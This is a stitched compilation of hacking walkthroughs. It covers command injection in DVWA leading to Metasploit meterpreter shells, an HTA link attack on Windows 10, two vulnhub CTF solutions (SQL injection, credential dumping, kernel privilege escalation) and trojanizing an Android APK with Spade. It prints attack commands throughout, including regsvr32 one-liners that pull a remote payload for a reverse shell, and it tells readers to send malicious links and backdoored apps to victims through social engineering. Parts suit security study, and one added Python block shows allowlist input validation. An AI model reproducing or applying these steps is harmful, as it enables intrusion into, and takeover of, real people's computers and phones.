Command Injection Exploitation in DVWA using Metasploit (Bypass All Security)

Command injection is an attack whose goal is the execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely because of insufficient input validation.

This attack differs from code injection in that code injection allows the attacker to add their own code, which is then executed by the application. In code injection, the attacker extends the default functionality of the application without needing to execute system commands. Source:


First install DVWA on your PC; the full installation article can be read here.

Now open DVWA on your PC and log in with the following credentials:

Username – admin
Password – password

Bypass Low Level Security

Click on DVWA Security and set Website Security Level to Low.


Use "&&" in the command injection to bypass the low security level of this server.


Go to the Command Execution page, enter an IP address and click Submit.


Now you can see the reply, which means we have established a connection with the server. Try as many variations as possible to provide a command to execute. You will see this every time!


We can also execute multiple commands at one time just by using the "&&" operator. For example, the next command is 192.168.1.100 && dir; click Submit, and this command will enumerate the directories and files.


We have found 4 directories and a file, as well as the path of this directory.


The next command is 192.168.1.100 && net user; click Submit, and this will show the user accounts.


Here you can see the list of all users.


Whatever command you submit, you will get the desired result. Now I want to get a shell through command injection with the help of Metasploit.

msf > use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set payload windows/meterpreter/reverse_tcp
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.106
msf exploit(regsvr32_applocker_bypass_server) > set lport 4444
msf exploit(regsvr32_applocker_bypass_server) > exploit

We can also use the following command to make the remote host connect back to Metasploit.


192.168.1.100 && regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll and click Submit.


Now you will get a meterpreter session on the victim's PC. Type sysinfo to get system information.


Bypass Medium Level Security
Click on DVWA Security and set Website Security Level to Medium.
Use the pipe "|" in the command injection to bypass the medium security level of this server.

Follow the same process as above using Metasploit:
192.168.1.100 | regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll and click Submit.


Again we got meterpreter session 2.


Bypass High Level Security
Click on DVWA Security and set Website Security Level to High.

Try to use "||" in the command injection to bypass the high security level of this server.


Follow the same process as above using Metasploit:
192.168.1.100 || regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll and click Submit.


Yes, we have meterpreter session 3 as well.
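The three levels above all rely on stripping separators from the input, and each level falls to the next separator. The following added example (constructed for this article, not DVWA's own source) models that denylist behaviour with the walkthrough's own payloads beside an allowlist validator that accepts only a literal IP address and never invokes a shell; the per-level denylists are an assumption chosen to reproduce what the walkthrough shows, not copied from DVWA.

```python
"""Denylist vs allowlist input validation for a ping-style command form.

Constructed example, not DVWA's own source: the denylists below only
model the behaviour seen in the walkthrough (each separator that works
at one level is stripped at the next), to show why stripping separators
is not a fix and a strict allowlist with no shell is.
"""
import ipaddress

# Constructed denylists (assumption: modelled on the walkthrough, not copied
# from DVWA). Note the "| " entry carries a trailing space, so "||" survives.
DENYLISTS = {
    "low": [],
    "medium": ["&&", ";"],
    "high": ["&&", ";", "| "],
}

SHELL_METACHARS = ("&", "|", ";", "`", "$(", "\n")


def denylist_filter(user_input: str, level: str) -> str:
    """Strip listed substrings, the way a blacklist-style filter does."""
    cleaned = user_input
    for bad in DENYLISTS[level]:
        cleaned = cleaned.replace(bad, "")
    return cleaned


def still_injectable(filtered: str) -> bool:
    """True if anything a shell would treat as a separator survived."""
    return any(meta in filtered for meta in SHELL_METACHARS)


def is_safe_target(user_input: str) -> bool:
    """Allowlist check: accept exactly one literal IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(user_input.strip())
    except ValueError:
        return False
    return True


def build_ping_argv(user_input: str) -> list:
    """Argv for subprocess.run(argv, shell=False); rejects anything else.

    With an argv list and no shell, '&&', '|' and '||' are never parsed
    as operators, so the question of which separator to deny disappears.
    """
    if not is_safe_target(user_input):
        raise ValueError("target must be a single IP address")
    return ["ping", "-c", "1", user_input.strip()]
```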

Hack Remote Windows 10 PC using HTA Web Server


Exploit Targets
Windows All Versions

Requirement
Attacker: Kali Linux
Victim PC: Windows 10


Open a Kali terminal and type msfconsole.


Send the link of the server to the victim via chat, email or any other social engineering technique.
When the victim machine browses to your link it will download the anything.hta file; when the victim clicks on it you will get the meterpreter session.


Now you have access to the victim's PC. Use "sessions -l" to list the sessions and their numbers, then type "sessions -i ID" to connect to a session.

Hack the SpyderSec VM (CTF Challenge)


Hello friends!! Today we are going to solve another CTF challenge, "SpyderSec", presented by vulnhub.com to practice OSCP lab challenges.
Challenge: You are looking for two flags. Using discovered pointers in various elements of the running web application you can deduce the first flag (a downloadable file), which is required to find the second flag (a text file). Look, read and maybe even listen. You will need to use basic web application recon skills as well as some forensics to find both flags.
You can download it from here: https://www.vulnhub.com/entry/spydersec-challenge,128/
Level: Intermediate
Penetration Methodology:
§  Network Scanning (Netdiscover, Nmap)
§  Extracting Metadata (Exiftool)
§  Decoding Hex to ASCII
§  Unpacking the eval function with a JavaScript unpacker
§  Capturing the HTTP request (Burp Suite)
§  Decoding the URI to get the mulder.fbi file
§  Unlocking the hidden drive (VeraCrypt)
§  Capturing the flag

Walkthrough
Let's start off by scanning the network to find our target.
netdiscover
Our target is 192.168.1.101. Scan the target with nmap.
nmap -A 192.168.1.101


There are only two ports open, i.e. 22 and 80, for SSH and HTTP respectively. Next, I opened this page in the browser.


There was nothing major on the page except for two images. There is a possibility of metadata hidden in these images. Therefore, I read these images with exiftool. One of the images, saved under the name "challenge", had a comment in it. To read it type:
exiftool Challenge.png


If you observe closely, the comment is in hexadecimal form. We need to convert it into readable form. No third-party tool is required: just go to an online hex to ASCII converter, paste the string in the text box and click the convert button.


After converting we again have a hexadecimal string. No problem. Let's convert it again as we did earlier.


This time we got a base64-encoded string, and to decode it we use the following command:
echo 'base64 text' | base64 -d
Now finally we have a readable string. This can be a password or a directory. Note it down for future use.
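The comment above is decoded by hand in three passes (hex, hex, then base64). As an added example for this walkthrough (not part of the original write-up), the script below automates that peeling: it tries each decoder in turn, keeps a layer only when the result is printable text, and stops when nothing decodes further. The sample comment is constructed inside the script, not the real comment from Challenge.png.

```python
"""Peel layered hex/base64 encodings until a readable string remains.

Added example, not part of the original walkthrough. SAMPLE_COMMENT is
constructed here (base64 wrapped in hex twice), not the real EXIF comment.
"""
import base64
import binascii
import string

PRINTABLE = set(string.printable)


def looks_readable(data: bytes) -> bool:
    """True only if every byte decodes to a printable ASCII character."""
    try:
        return all(ch in PRINTABLE for ch in data.decode("ascii"))
    except UnicodeDecodeError:
        return False


def try_hex(data: bytes):
    """Decode an even-length hex string, or return None."""
    s = data.strip()
    if not s or len(s) % 2:
        return None
    try:
        return binascii.unhexlify(s)
    except (binascii.Error, ValueError):
        return None


def try_base64(data: bytes):
    """Strictly decode base64 (bad alphabet or padding -> None)."""
    try:
        return base64.b64decode(data.strip(), validate=True)
    except (binascii.Error, ValueError):
        return None


def peel(data: bytes, max_layers: int = 8):
    """Return (layers, text): the decoders that fired and the final string."""
    layers = []
    for _ in range(max_layers):
        for name, decoder in (("hex", try_hex), ("base64", try_base64)):
            out = decoder(data)
            if out and looks_readable(out):   # keep only sensible layers
                layers.append(name)
                data = out
                break
        else:
            break                              # nothing decoded: done
    return layers, data.decode("ascii", errors="replace")


def make_sample(secret: str) -> str:
    """Constructed input: base64 of the secret, hex-encoded twice."""
    layer = base64.b64encode(secret.encode()).decode()
    for _ in range(2):
        layer = binascii.hexlify(layer.encode()).decode()
    return layer


SAMPLE_COMMENT = make_sample("constructed-secret")
```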


Moving on, if you go through the source code of the home page you will find that the eval function there is quite unusual.


I searched for the eval function on Google and found that it is JavaScript. There can be code hidden behind it, so let's unpack it with a JavaScript unpacker.
After unpacking you will again come face to face with a hexadecimal string. Convert this string just like before.


After conversion the string became "alert('mulder.fbi');".


I explored and searched a lot but found nothing about it, so I decided to capture its cookies through Burp Suite.

In the cookies I found an encoded URI, which means it is part of a link. Copy the link from here and open it in the browser.



Now when I opened it there was an error. Then I explored a bit and remembered that there was a mulder.fbi, so I added that to the link.



After adding mulder.fbi to the link it asked me to download a file. Save it.


When you open the file that you just saved, it will play a video with different quotes. I was clueless about this, so I started searching about it on Google and found out that it was a TrueCrypt file. To see what is hidden, type:
python tcsteg.py mulder.fbi



There was a whole drive hidden behind it, and using VeraCrypt you can see and open the drive.



When you open it, it will ask for a password, and we found the password beforehand. Give the password there.


Hence the drive will be unlocked. Now open the drive and you will find the flag there.

Hack the VulOS 2.0 VM (CTF Challenge)


"Your assignment is to pentest a company website, get root of the system and read the final flag" is the only thing we know about this VM, other than that it is a smaller one. Therefore, without any further ado, let's start by finding our target, a.k.a. the victim.
Breaching Methodologies:
·         Network Scanning (netdiscover, Nmap)
·         Enumeration (source code review)
·         Use exploit 32075 (searchsploit)
·         SQL injection (sqlmap)
·         Use the fetched credentials for SSH login
·         Kernel privilege escalation (exploit 37292)
·         Get root access and capture the flag


Here it has discovered the target IP, 192.168.1.102, and now we will run nmap to determine what services are running.
nmap -p- -A 192.168.1.102

So, the services running are SSH on port 22, HTTP on port 80 and IRC on port 6667. As port 80 is open, we can open it in a browser.

Since we didn't find anything on the web page, we looked into its source code and saw a link, /jabc; let's open it.

When we explored /jabc in the browser, it showed the following page.

In this web page there were various tabs. I explored each tab, including its page source, and found nothing except for the last tab, i.e. Document.

When you look into the page source there is a line saying "/jabd0cs/ on the server. Just log in with guest/guest."

So, I opened the directory and logged in with guest:guest as username:password. There was an upload option, but it was restricted to .doc files only, so it was pretty useless.
If you observe the login page, there is a CMS, OpenDocMan v1.2.7. This version of OpenDocMan is vulnerable.

Let's search for exploits to be used against OpenDocMan. For that type:
searchsploit OpenDocMan 1.2.7
From its results we found exploit 32075.txt, which states: "the vulnerability exists due to insufficient validation of "add_value" HTTP GET parameter in "/ajax_udf.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database."

Now we will use sqlmap to find the database of usernames and passwords. For that type:
sqlmap -u 'http://192.168.1.102/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' --risk=3 --level=5 --dbs --threads=4 --batch

And we have fetched the database name "jabcd0cs".

sqlmap -u 'http://192.168.1.102/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' -D jabcd0cs --risk=3 --level=5 --threads=4 --dump-all --batch
This sqlmap command will show us all the usernames and passwords, as shown below.

As you can see, the password is an MD5 hash. We can crack it online; no third-party tool is needed.

The password turns out to be webmin1980 with the username webmin. As we have a username and password, we can log in through SSH. To do so, open a new terminal in Kali and type:
ssh webmin@192.168.1.102
Then give the password when asked and you will have a session. Let's check the version of the kernel to see whether it is vulnerable or not.
lsb_release -a

The version is 14.04, which means it can be exploited. For that type:
searchsploit ubuntu 14.04
It shows many exploits, and from those we chose 37292.c, "'overlayfs' Local Privilege Escalation".

Start a Python HTTP server to transfer it to the victim's machine.



Type the following command to download it:
cd /tmp
wget https://192.168.1.108/37292.c
Now that the exploit is downloaded, as always we need to compile it and then run it. The set of commands is:
gcc 37292.c -o shell
./shell
And voila, you have root, but our challenge is not complete yet. We still have to find the flag. Once you have root, go into the /root directory:
id
cd /root
Let's check what files and folders it is holding.
ls
And here you will find flag.txt. Read it!
cat flag.txt

Hack any Android Phone using Spade APK Backdoor

In this article we will learn yet another method to hack Android. This is the most uncontrived way of hacking an Android user, as you are binding your malicious file with the original one, just like we did with the APK earlier.
Firstly, we will download CCleaner from www.apk4fun.com, as we will bind our payload file with it.
Our next step will be downloading the software Spade. To download it, go to the terminal in your Kali and type:



Running the above command installs the software successfully. Next, type:
./spade.py /root/Desktop/ccleaner.apk
When you run the above command it will ask you for information about the payload, lhost and lport. For the payload select option 3, i.e. type 3. Then give the lhost and lport:

Lhost > 192.168.0.104
Lport > 4444


The preceding commands bind the original file with our personalized malicious file.


After it has all been done successfully, it will ask us whether to set up the listener. Type 'y' here; a new APK will now be saved in the spade folder.


Now you can go ahead and send the victim the link so that they can download it.


When the victim clicks Install, the application will be installed along with our malicious file.


And when the application is opened you will have the victim's session.


As you remember, you typed 'y' earlier to create the listener, and the listener is created automatically with the details you gave previously. Then, to get the session, simply type:

sessions -i 1